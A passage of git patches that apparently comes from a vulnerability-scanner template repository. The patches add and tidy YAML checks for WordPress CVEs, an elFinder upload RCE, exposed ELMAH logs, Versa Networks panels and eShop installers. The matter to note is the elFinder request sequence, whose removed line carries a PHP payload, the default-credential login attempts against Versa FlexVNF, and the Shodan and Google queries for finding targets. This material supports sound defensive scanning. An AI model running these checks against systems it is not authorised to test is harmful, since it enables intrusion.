https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 - - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 metadata: - verified: "true" + verified: true tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop requests: From 61c6c59500cd6e2016d9fd01f296cc9f86be4cc5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:51:44 +0530 Subject: [PATCH 0585/1415] Update CVE-2022-3578.yaml --- cves/2022/CVE-2022-3578.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index fb65fa2963..7f70a85cac 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-3578 cwe-id: CWE-79 metadata: - verified: "true" + verified: true tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022 requests: From 39460077a91bc5d41c984ee743bac07e8e98a0af Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:52:10 +0530 Subject: [PATCH 0586/1415] Update CVE-2022-3484.yaml --- cves/2022/CVE-2022-3484.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index 4398c2aae1..2785c4e02a 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - verified: "true" + verified: true tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress requests: From bfdbe2b901994075b72a0cddbc8e26a2c3575dcc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:58:55 +0530 Subject: [PATCH 0587/1415] Update CVE-2022-3484.yaml --- cves/2022/CVE-2022-3484.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index 2785c4e02a..627531bae3 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -17,7 +17,7 @@ info: metadata: google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php verified: true - tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress + tags: cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core requests: - method: GET From a303fde2290b0b7ef9de27d1d06b8d29d0974e0f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 09:33:09 +0000 Subject: [PATCH 0588/1415] Auto Generated New Template Addition List [Thu Nov 24 09:33:09 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 537d3110ce..c33a0ff5b5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ exposed-panels/fastpanel-hosting-control-panel.yaml +exposed-panels/nuxeo-platform-panel.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/libvirt-exporter-metrics.yaml misconfiguration/lvm-exporter-metrics.yaml From f33fd6dd09db62515be6f6597a38063eac921ee4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 09:35:00 +0000 Subject: [PATCH 0589/1415] Auto Generated New Template Addition List [Thu Nov 24 09:35:00 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c33a0ff5b5..e3afeca48d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ exposed-panels/fastpanel-hosting-control-panel.yaml +exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/libvirt-exporter-metrics.yaml From 861a559ab3de2245df335a3fa91a5e8a075e6335 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 09:49:52 +0000 Subject: [PATCH 0591/1415] Auto Generated CVE annotations [Thu Nov 24 09:49:52 UTC 2022] :robot: --- cves/2022/CVE-2022-3484.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index 2c0b37560c..ed9b10639f 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -17,7 +17,7 @@ info: metadata: verified: true google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - tags: cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core + tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core requests: - method: GET From dc140e5c831f7b85cef49289f916b33ddf23359b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 09:54:39 +0000 Subject: [PATCH 0592/1415] Auto Generated New Template Addition List [Thu Nov 24 09:54:39 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e3afeca48d..366240e662 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml From 66d0ae1a6f82143b10e15ebf15cc30af374f6e84 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 16:05:00 +0530 Subject: [PATCH 0593/1415] Update elmah-log-file.yaml --- exposures/logs/elmah-log-file.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/exposures/logs/elmah-log-file.yaml b/exposures/logs/elmah-log-file.yaml index 09c4b8d968..1e8a4b7057 100644 --- a/exposures/logs/elmah-log-file.yaml +++ b/exposures/logs/elmah-log-file.yaml @@ -1,7 +1,7 @@ id: elmah-log-file info: - name: elmah.axd Disclosure + name: ELMAH Exposure author: shine,idealphase severity: medium description: | @@ -9,20 +9,21 @@ info: reference: - https://code.google.com/archive/p/elmah/ - https://www.troyhunt.com/aspnet-session-hijacking-with-google/ - tags: logs,exposure + metadata: + verified: true + tags: logs,elmah,exposure requests: - method: GET path: - - "{{BaseURL}}/elmah.axd" - "{{BaseURL}}/elmah" + - "{{BaseURL}}/elmah.axd" stop-at-first-match: true host-redirects: true max-redirects: 2 matchers-condition: and matchers: - - type: word words: - 'Error Log for' From c9031b9b0796f05b2a777223eb7bf8432e6466e2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Nov 2022 16:40:36 +0530 Subject: [PATCH 0595/1415] Update CVE-2021-43421.yaml --- cves/2021/CVE-2021-43421.yaml | 12 +++--------- 1 file changed, 3 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml index 52138e0c98..839d5389ba 100644 --- a/cves/2021/CVE-2021-43421.yaml +++ b/cves/2021/CVE-2021-43421.yaml @@ -13,7 +13,7 @@ info: cve-id: CVE-2021-43421 metadata: verified: true - tags: cve,cve2021,elfinder,unauth,upload,rce + tags: cve,cve2021,elfinder,upload,rce,intrusive requests: - raw: @@ -23,14 +23,9 @@ requests: Accept: */* - | - GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e HTTP/1.1 + GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1 Host: {{Hostname}} - - | - GET /elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - | GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1 Host: {{Hostname}} @@ -40,8 +35,7 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr}}")' - - 'contains(body_4, "{{randstr_1}}")' + - 'contains(body_3, "{{randstr_1}}")' - "status_code == 200" condition: and From 97610c6eff3943e1035548443f9e89318602a922 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Nov 2022 17:28:29 +0530 Subject: [PATCH 0596/1415] Create versa-analytics-server --- technologies/versa/versa-analytics-server | 35 +++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 technologies/versa/versa-analytics-server diff --git a/technologies/versa/versa-analytics-server b/technologies/versa/versa-analytics-server new file mode 100644 index 0000000000..d045550a6b --- /dev/null +++ b/technologies/versa/versa-analytics-server @@ -0,0 +1,35 @@ +id: versa-analytics-server + +info: + name: Versa Analytics Server Detection + description: Versa Analytics Server Detection + author: c-sh0 + severity: info + reference: + - https://versa-networks.com/products/components/ + tags: panel,versa,sdwan + +requests: + - method: GET + path: + - "{{BaseURL}}" + + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "Versa" + + extractors: + - type: kval + part: header + kval: + - Server From e7414f00f9d4223166e3bf2582e8d7e6ccf38542 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Nov 2022 17:29:28 +0530 Subject: [PATCH 0597/1415] Update versa-analytics-server --- technologies/versa/versa-analytics-server | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/technologies/versa/versa-analytics-server b/technologies/versa/versa-analytics-server index d045550a6b..a8dfa249a5 100644 --- a/technologies/versa/versa-analytics-server +++ b/technologies/versa/versa-analytics-server @@ -14,20 +14,20 @@ requests: path: - "{{BaseURL}}" - stop-at-first-match: true redirects: true max-redirects: 2 matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - "Versa" + - type: status + status: + - 200 + extractors: - type: kval part: header From 1d959c4943364a18b2cb11afb25cdc52d11ba150 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Nov 2022 17:30:26 +0530 Subject: [PATCH 0598/1415] Create versa-director-api.yaml --- technologies/versa/versa-director-api.yaml | 33 ++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 technologies/versa/versa-director-api.yaml diff --git a/technologies/versa/versa-director-api.yaml b/technologies/versa/versa-director-api.yaml new file mode 100644 index 0000000000..f5c7faaecd --- /dev/null +++ b/technologies/versa/versa-director-api.yaml @@ -0,0 +1,33 @@ +id: versa-director-api + +info: + name: Versa Director API Endpoint Detection + description: Versa Director API Endpoint (Unauthorized) Detection + author: c-sh0 + severity: info + reference: + - https://versa-networks.com/products/components/ + metadata: + shodan-query: + - ssl:"versa" + - port:9182 + tags: api,versa,sdwan + +requests: + - method: GET + path: + - "{{BaseURL}}" + + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 401 + + - type: regex + part: body + regex: + - '(?i)"more_info":"http://nms.versa.com/errors/4001"' From 631fff8329da34c3704c957f857b1a9760922ecf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Nov 2022 17:31:03 +0530 Subject: [PATCH 0599/1415] Update versa-director-api.yaml --- technologies/versa/versa-director-api.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/technologies/versa/versa-director-api.yaml b/technologies/versa/versa-director-api.yaml index f5c7faaecd..298c73aa7d 100644 --- a/technologies/versa/versa-director-api.yaml +++ b/technologies/versa/versa-director-api.yaml @@ -8,26 +8,24 @@ info: reference: - https://versa-networks.com/products/components/ metadata: - shodan-query: - - ssl:"versa" - - port:9182 - tags: api,versa,sdwan + shodan-query: ssl:"versa" port:9182 + tags: api,versa,sdwan,tech requests: - method: GET path: - "{{BaseURL}}" - stop-at-first-match: true redirects: true max-redirects: 2 matchers-condition: and matchers: - - type: status - status: - - 401 - type: regex part: body regex: - '(?i)"more_info":"http://nms.versa.com/errors/4001"' + + - type: status + status: + - 401 From 7953c783d3d6dc31b66455be317d9138f82ae3e2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Nov 2022 17:33:08 +0530 Subject: [PATCH 0600/1415] Create versa --- exposed-panels/versa | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 exposed-panels/versa diff --git a/exposed-panels/versa b/exposed-panels/versa new file mode 100644 index 0000000000..880f9cef58 --- /dev/null +++ b/exposed-panels/versa @@ -0,0 +1,39 @@ + + +id: versa-director-ui-detect + +info: + name: Versa Director UI Login Panel + description: Versa Director Login Panel detection ( is broken by newline, additional regex should Future proof this?) + author: c-sh0 + severity: info + reference: + - https://versa-networks.com/products/components/ + metadata: + shodan-query: http.title:"VERSA DIRECTOR Login" + tags: panel,versa,sdwan + +requests: + - method: GET + path: + - "{{BaseURL}}/versa/login" + + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "VERSA DIRECTOR" + - "Login" + condition: and + + - type: regex + part: body + regex: + - '(?i)(VERSA DIRECTOR)' From ddd690bbb4322cbcbaab6bbb2e52e36b16e21b47 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 24 Nov 2022 17:34:47 +0530 Subject: [PATCH 0601/1415] Delete versa --- exposed-panels/versa | 39 --------------------------------------- 1 file changed, 39 deletions(-) delete mode 100644 exposed-panels/versa diff --git a/exposed-panels/versa b/exposed-panels/versa deleted file mode 100644 index 880f9cef58..0000000000 --- a/exposed-panels/versa +++ /dev/null @@ -1,39 +0,0 @@ - - -id: versa-director-ui-detect - -info: - name: Versa Director UI Login Panel - description: Versa Director Login Panel detection (<title> is broken by newline, additional regex should Future proof this?) - author: c-sh0 - severity: info - reference: - - https://versa-networks.com/products/components/ - metadata: - shodan-query: http.title:"VERSA DIRECTOR Login" - tags: panel,versa,sdwan - -requests: - - method: GET - path: - - "{{BaseURL}}/versa/login" - - stop-at-first-match: true - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "VERSA DIRECTOR" - - "Login" - condition: and - - - type: regex - part: body - regex: - - '(?i)(VERSA DIRECTOR)' From 7d47d3b2a4c2f029e6810dd3eaa31851f4f09924 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 24 Nov 2022 17:35:09 +0530 Subject: [PATCH 0602/1415] Update versa-sdwan.yaml --- exposed-panels/{ => versa}/versa-sdwan.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{ => versa}/versa-sdwan.yaml (91%) diff --git a/exposed-panels/versa-sdwan.yaml b/exposed-panels/versa/versa-sdwan.yaml similarity index 91% rename from exposed-panels/versa-sdwan.yaml rename to exposed-panels/versa/versa-sdwan.yaml index 4bd5506203..4752fcc138 100644 --- a/exposed-panels/versa-sdwan.yaml +++ b/exposed-panels/versa/versa-sdwan.yaml @@ -16,4 +16,4 @@ requests: matchers: - type: word words: - - "Versa Networks" \ No newline at end of file + - "Versa Networks" From 55f142ce370607dad204d50d9821160f1b9e048b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 24 Nov 2022 17:36:26 +0530 Subject: [PATCH 0603/1415] Create versa-director-login.yaml --- .../versa/versa-director-login.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 exposed-panels/versa/versa-director-login.yaml diff --git a/exposed-panels/versa/versa-director-login.yaml b/exposed-panels/versa/versa-director-login.yaml new file mode 100644 index 0000000000..a8218d8c09 --- /dev/null +++ b/exposed-panels/versa/versa-director-login.yaml @@ -0,0 +1,37 @@ +id: versa-director-login + +info: + name: Versa Director UI Login Panel + description: Versa Director Login Panel detection (<title> is broken by newline, additional regex should Future proof this?) + author: c-sh0 + severity: info + reference: + - https://versa-networks.com/products/components/ + metadata: + shodan-query: http.title:"VERSA DIRECTOR Login" + tags: panel,versa,sdwan + +requests: + - method: GET + path: + - "{{BaseURL}}/versa/login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + words: + - "VERSA DIRECTOR" + - "Login" + condition: and + + - type: regex + part: body + regex: + - '(?i)(VERSA DIRECTOR)' + + - type: status + status: + - 200 From db119cfbf2de8acd8cf9b9c20701484dd12a66e2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 24 Nov 2022 17:37:30 +0530 Subject: [PATCH 0604/1415] Create versa-flexvnf-server.yaml --- technologies/versa-flexvnf-server.yaml | 37 ++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 technologies/versa-flexvnf-server.yaml diff --git a/technologies/versa-flexvnf-server.yaml b/technologies/versa-flexvnf-server.yaml new file mode 100644 index 0000000000..050e152d21 --- /dev/null +++ b/technologies/versa-flexvnf-server.yaml @@ -0,0 +1,37 @@ +id: versa-flexvnf-server + +info: + name: Versa FlexVNF Server + description: Versa FlexVNF Server Detection (magic request params exposes Server signature/version) + author: c-sh0 + severity: info + reference: + - https://versa-networks.com/products/components/ + tags: tech,versa,flexvnf,sdwan + +requests: + - method: GET + path: + - "{{BaseURL}}/&?=?" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + part: header + words: + - "Server: Versa" + - "FlexVNF" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server From 9c5279bba86d85a21c25bd99733beaf269e1f783 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 24 Nov 2022 17:39:34 +0530 Subject: [PATCH 0605/1415] Create versa-flexvnf-ui-default-login.yaml --- .../versa/versa-flexvnf-ui-default-login.yaml | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 default-logins/versa/versa-flexvnf-ui-default-login.yaml diff --git a/default-logins/versa/versa-flexvnf-ui-default-login.yaml b/default-logins/versa/versa-flexvnf-ui-default-login.yaml new file mode 100644 index 0000000000..60f7762005 --- /dev/null +++ b/default-logins/versa/versa-flexvnf-ui-default-login.yaml @@ -0,0 +1,61 @@ +id: versa-flexvnf-ui-default-login + +info: + name: Versa Networks FlexVNF UI Default Login + author: c-sh0 + severity: high + description: Versa Networks FlexVNF UI default login + reference: + - https://versa-networks.com/products/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: default-login,panel,versa,sdwan,flexvnf + +requests: + - raw: + - | + GET /authenticate HTTP/1.1 + Host: {{Hostname}} + + - | + POST /authenticate HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 + Content-Type: application/json;charset=UTF-8 + CSRF-Token: {{xsrf_token}} + + {"username":"{{username}}","password":"{{password}}"} + + attack: pitchfork + payloads: + username: + - versa + - admin + password: + - versa123 + - versa123 + + cookie-reuse: true + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "{\"username\":\"{{username}}\",\"error\":false}" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: xsrf_token + group: 1 + internal: true + part: header + regex: + - '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)' From f13601a32e4c8f81bbf65d1c38e6ccf8cca077f2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 24 Nov 2022 17:41:08 +0530 Subject: [PATCH 0606/1415] Create versa-flexvnf-login.yaml --- exposed-panels/versa/versa-flexvnf-login.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposed-panels/versa/versa-flexvnf-login.yaml diff --git a/exposed-panels/versa/versa-flexvnf-login.yaml b/exposed-panels/versa/versa-flexvnf-login.yaml new file mode 100644 index 0000000000..1920eb0332 --- /dev/null +++ b/exposed-panels/versa/versa-flexvnf-login.yaml @@ -0,0 +1,32 @@ +id: versa-flexvnf-login + +info: + name: Flex VNF Web-UI Detection + description: Flex VNF Web-UI Panel Detection + author: c-sh0 + severity: info + reference: + - https://versa-networks.com/products/components/ + metadata: + shodan-query: http.title:"Flex VNF Web-UI" + tags: panel,versa,sdwan,flexvnf + +requests: + - method: GET + path: + - "{{BaseURL}}" + + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "<title>Flex VNF Web-UI" + + - type: status + status: + - 200 From c371ce73d9c0be63f4f6832dc1569b2e44cdbbaf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Nov 2022 17:41:53 +0530 Subject: [PATCH 0607/1415] Create versa-networks-logo.yaml --- technologies/versa/versa-networks-logo.yaml | 38 +++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 technologies/versa/versa-networks-logo.yaml diff --git a/technologies/versa/versa-networks-logo.yaml b/technologies/versa/versa-networks-logo.yaml new file mode 100644 index 0000000000..1d528de127 --- /dev/null +++ b/technologies/versa/versa-networks-logo.yaml @@ -0,0 +1,38 @@ +id: versa-networks-logo + +info: + name: Versa Networks Logo Detection + author: c-sh0 + severity: info + metadata: + shodan-query: + - http.favicon.hash:-1053531639 + - http.favicon.hash:186362384 + - http.favicon.hash:2033952700 + - http.favicon.hash:-1086395444 + reference: + - https://versa-networks.com/products/components/ + tags: tech,versa,sdwan,flexvnf + +requests: + - method: GET + path: + - "{{BaseURL}}/favicon.png" + - "{{BaseURL}}/images/versalogo.png" + - "{{BaseURL}}/images/versalogo2.png" + - "{{BaseURL}}/common/images/Logo.png" + - "{{BaseURL}}/versa/dist/images/versa-logo.png" + - "{{BaseURL}}/versa/styles/img/versa-logo.png" + - "{{BaseURL}}/versa/app/img/versa-logo.png" + + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-1053531639\" == mmh3(base64_py(body)))" + - "status_code==200 && (\"-1086395444\" == mmh3(base64_py(body)))" + - "status_code==200 && (\"186362384\" == mmh3(base64_py(body)))" + - "status_code==200 && (\"2033952700\" == mmh3(base64_py(body)))" + condition: or From 204b7ffa9e206b758e16feca809c6ceab96f49a0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 18:07:14 +0530 Subject: [PATCH 0608/1415] Update and Create eshop installer template --- misconfiguration/installer/eshop-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/installer/eshop-installer.yaml b/misconfiguration/installer/eshop-installer.yaml index 783f652350..294615f1d0 100644 --- a/misconfiguration/installer/eshop-installer.yaml +++ b/misconfiguration/installer/eshop-installer.yaml @@ -1,7 +1,7 @@ id: eshop-installer info: - name: OXID eShop Installer Exposure + name: EShop Installer Exposure author: DhiyaneshDk severity: high metadata: From 7a2cdc0da512aad4eda7a3a2d6ed86f98695a358 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 18:11:49 +0530 Subject: [PATCH 0609/1415] Create oxid-eshop-installer.yaml --- .../installer/oxid-eshop-installer.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/oxid-eshop-installer.yaml diff --git a/misconfiguration/installer/oxid-eshop-installer.yaml b/misconfiguration/installer/oxid-eshop-installer.yaml new file mode 100644 index 0000000000..cd25411116 --- /dev/null +++ b/misconfiguration/installer/oxid-eshop-installer.yaml @@ -0,0 +1,28 @@ +id: oxid-eshop-installer + +info: + name: Oxid EShop Installer Exposure + author: ritikchaddha + severity: high + metadata: + verified: true + shodan-query: title:"OXID eShop installation" + tags: misconfig,oxid,eshop,install,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/Setup/index.php/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'OXID eShop installation' + - 'System Requirements' + condition: and + + - type: status + status: + - 200 From c31c0df9a7fd0742ca6d556cf8d94f88a36404fa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 12:48:41 +0000 Subject: [PATCH 0611/1415] Auto Generated New Template Addition List [Thu Nov 24 12:48:41 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 366240e662..a804ffcffe 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml misconfiguration/collectd-exporter-metrics.yaml +misconfiguration/installer/oxid-eshop-installer.yaml misconfiguration/libvirt-exporter-metrics.yaml misconfiguration/lvm-exporter-metrics.yaml misconfiguration/mysqld-exporter-metrics.yaml From 528c713f0a36684a00fc0b4559af8d8bb4ccfcc8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 18:52:24 +0530 Subject: [PATCH 0612/1415] Update versa-flexvnf-ui-default-login.yaml --- .../versa/versa-flexvnf-ui-default-login.yaml | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) diff --git a/default-logins/versa/versa-flexvnf-ui-default-login.yaml b/default-logins/versa/versa-flexvnf-ui-default-login.yaml index 60f7762005..b5f582fdfd 100644 --- a/default-logins/versa/versa-flexvnf-ui-default-login.yaml +++ b/default-logins/versa/versa-flexvnf-ui-default-login.yaml @@ -1,17 +1,15 @@ -id: versa-flexvnf-ui-default-login +id: versa-flexvnf-default-login info: - name: Versa Networks FlexVNF UI Default Login + name: Versa FlexVNF Web-UI - Default Login author: c-sh0 severity: high - description: Versa Networks FlexVNF UI default login reference: - https://versa-networks.com/products/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: default-login,panel,versa,sdwan,flexvnf + metadata: + verified: true + shodan-query: title:"Flex VNF Web-UI" + tags: default-login,versa,flexvnf requests: - raw: @@ -22,7 +20,6 @@ requests: - | POST /authenticate HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/json;charset=UTF-8 CSRF-Token: {{xsrf_token}} @@ -41,7 +38,6 @@ requests: stop-at-first-match: true matchers-condition: and matchers: - - type: word part: body words: From 3253ce7c998a013957d0927b0140c23ff3f051c1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 18:56:21 +0530 Subject: [PATCH 0613/1415] Update versa-director-login.yaml --- exposed-panels/versa/versa-director-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/versa/versa-director-login.yaml b/exposed-panels/versa/versa-director-login.yaml index a8218d8c09..ff042fffc7 100644 --- a/exposed-panels/versa/versa-director-login.yaml +++ b/exposed-panels/versa/versa-director-login.yaml @@ -2,8 +2,9 @@ id: versa-director-login info: name: Versa Director UI Login Panel - description: Versa Director Login Panel detection ( is broken by newline, additional regex should Future proof this?) author: c-sh0 + description: | + Versa Director Login Panel detection (<title> is broken by newline, additional regex should Future proof this?) severity: info reference: - https://versa-networks.com/products/components/ From 60cca85c59e92fe0d2ee7c69e1c65574bbe60f74 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 18:56:54 +0530 Subject: [PATCH 0614/1415] Update versa-flexvnf-server.yaml --- technologies/versa-flexvnf-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/versa-flexvnf-server.yaml b/technologies/versa-flexvnf-server.yaml index 050e152d21..d26d850438 100644 --- a/technologies/versa-flexvnf-server.yaml +++ b/technologies/versa-flexvnf-server.yaml @@ -24,7 +24,7 @@ requests: words: - "Server: Versa" - "FlexVNF" - condition: and + condition: and - type: status status: From 265344eb73d234471766f574ded0cbd022e48f87 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 18:57:38 +0530 Subject: [PATCH 0615/1415] Update versa-flexvnf-login.yaml --- exposed-panels/versa/versa-flexvnf-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/versa/versa-flexvnf-login.yaml 